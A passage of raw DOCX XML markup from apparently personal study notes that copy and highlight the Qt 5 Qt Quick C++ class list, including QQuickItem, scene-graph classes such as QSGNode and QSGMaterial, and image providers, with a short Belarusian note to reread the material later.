            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickImageProvider</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRDefault="00490E7E" w:rsidP="00D77D11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2807" w:history="1">
        <w:r w:rsidR="00FB76FA" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-module.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FB76FA" w:rsidRPr="00FB76FA" w:rsidRDefault="00FB76FA" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2587" w:name="_Toc483001095"/>
      <w:bookmarkStart w:id="2588" w:name="_Toc483004064"/>
      <w:bookmarkStart w:id="2589" w:name="_Toc483604430"/>
      <w:bookmarkStart w:id="2590" w:name="_Toc483605650"/>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick C++ Classes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2587"/>
      <w:bookmarkEnd w:id="2588"/>
      <w:bookmarkEnd w:id="2589"/>
      <w:bookmarkEnd w:id="2590"/>
    </w:p>
    <w:p w:rsidR="00FB76FA" w:rsidRPr="001945D5" w:rsidRDefault="00FB76FA" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Qt Quick module provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>classes for embedding Qt Quick in Qt/C++ applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkStart w:id="2591" w:name="classes"/>
      <w:bookmarkEnd w:id="2591"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9922"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253"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>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FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2808" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="FF0000"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickFramebufferObject</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 xml:space="preserve">Convenience class for integrating </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB76FA">
              <w:rPr>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OpenGL rendering using a framebuffer object (FBO)</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB76FA">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> with Qt Quick</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB76FA" w:rsidRPr="00FB76FA"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FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2809" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="FF0000"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickFramebufferObject::Renderer</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5669" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FB76FA" w:rsidRPr="00FB76FA" w:rsidRDefault="00FB76FA" w:rsidP="00FB76FA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pP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10" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickItem::ItemChangeData</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Adds supplimentary information to the QQuickItem::itemChange() function</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11" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickItem</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The most basic of all visual items in Qt Quick</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FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2812" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="FF0000"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickItemGrabResult</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Contains the result from QQuickItem::grabToImage()</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13" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickPaintedItem</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Way to use the QPainter API in the QML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FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2814" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="FF0000"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickRenderControl</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Mechanism for rendering the Qt Quick scenegraph onto an offscreen render target in a fully application-controlled manner</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FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2815" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="FF0000"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickTextDocument</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Access to the QTextDocument of QQuickTextEdit</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16" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickView</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Window for displaying a Qt Quick user interface</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17" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickWindow</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The window for displaying a graphical QML scene</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FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2818" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="FF0000"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGAbstractRenderer</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Gives access to the scene graph nodes and rendering of a QSGEngine</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19" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGGeometry::Attribute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QSGGeometry::Attribute describes a single vertex attribute in a QSGGeometry</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20" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGGeometry::AttributeSet</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QSGGeometry::AttributeSet describes how the vertices in a QSGGeometry are built up</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21" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGGeometry::ColoredPoint2D</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 xml:space="preserve">QSGGeometry::ColoredPoint2D struct is a convenience struct for accessing 2D Points with a </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB76FA">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>color</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22" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGGeometry::Point2D</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QSGGeometry::Point2D struct is a convenience struct for accessing 2D Points</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23" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGGeometry</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Low-level storage for graphics primitives in the Qt Quick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24" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGGeometry::TexturedPoint2D</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QSGGeometry::TexturedPoint2D struct is a convenience struct for accessing 2D Points with texture coordinates</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25" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGMaterial</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Encapsulates rendering state for a shader program</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26" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGMaterialShader</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Represents an OpenGL shader program in the renderer</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27" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGMaterialType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Used as a unique type token in combination with QSGMaterial</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28" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGMaterialShader::RenderState</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QSGMaterialShader::RenderState encapsulates the current rendering state during a call to QSGMaterialShader::updateState()</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29" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGBasicGeometryNode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Serves as a baseclass for geometry based nodes</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30" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGClipNode</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Implements the clipping functionality in the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31" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGGeometryNode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Used for all rendered content in the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32" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGNode</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The base class for all nodes in the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33" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGOpacityNode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Used to change opacity of nodes</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34" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGTransformNode</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Implements transformations in the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35" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGRendererInterface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An interface providing access to some of the graphics API specific internals of the scenegraph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36" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGRenderNode</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 xml:space="preserve">Represents a set of custom rendering commands targeting the graphics API that is in use by the </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB76FA">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>scenegraph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37" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGEngine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Allows low level rendering of a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38" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGFlatColorMaterial</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Convenient way of rendering solid colored geometry in the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39" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGImageNode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Provided for convenience to easily draw textured content using the QML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40" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGRectangleNode</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Convenience class for drawing solid filled rectangles using scenegraph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41" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGSimpleMaterial</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Template generated class used to store the state used with a QSGSimpleMateralShader</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42" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGSimpleMaterialShader</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Convenient way of building custom OpenGL-based materials for the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43" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGDynamicTexture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Serves as a baseclass for dynamically changing textures, such as content that is rendered to FBO's</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44" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGTexture</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Baseclass for textures used in the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45" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGOpaqueTextureMaterial</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Convenient way of rendering textured geometry in the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46" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGTextureMaterial</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Convenient way of rendering textured geometry in the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47" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGTextureProvider</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Encapsulates texture based entities in QML</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48" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGVertexColorMaterial</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Convenient way of rendering per-vertex colored geometry in the scene graph</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49" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickAsyncImageProvider</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Interface for for asynchronous control of QML image requests</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50" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickImageProvider</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Interface for supporting pixmaps and threaded image requests in QML</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51" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickImageResponse</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5669"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Interface for asynchronous image loading in QQuickAsyncImageProvider</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB76FA" w:rsidRPr="002230B8" w:rsidTr="00FB76FA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253"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490E7E" w:rsidP="00FB76FA">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2852" w:history="1">
              <w:r w:rsidR="00FB76FA" w:rsidRPr="00FB76FA">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QQuickTextureFactory</w:t>
              </w:r>
            </w:hyperlink>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>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Interface for loading custom textures from QML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FB76FA" w:rsidRPr="00FB76FA" w:rsidRDefault="00FB76FA" w:rsidP="00FB76FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="001945D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>я раней шмат пра гэта чыта</w:t>
      </w:r>
      <w:r w:rsidRPr="001945D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>ў. Потым перачытаць. Зараз няма сэнсу грунтоўна гэтым займацца</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB76FA" w:rsidRPr="00FB76FA" w:rsidRDefault="00FB76FA" w:rsidP="00FB76FA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B4800">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To include</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB76FA">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the definitions of the module's classes, use the following directive:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB76FA" w:rsidRPr="00FB76FA" w:rsidRDefault="00FB76FA" w:rsidP="00FB76FA">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
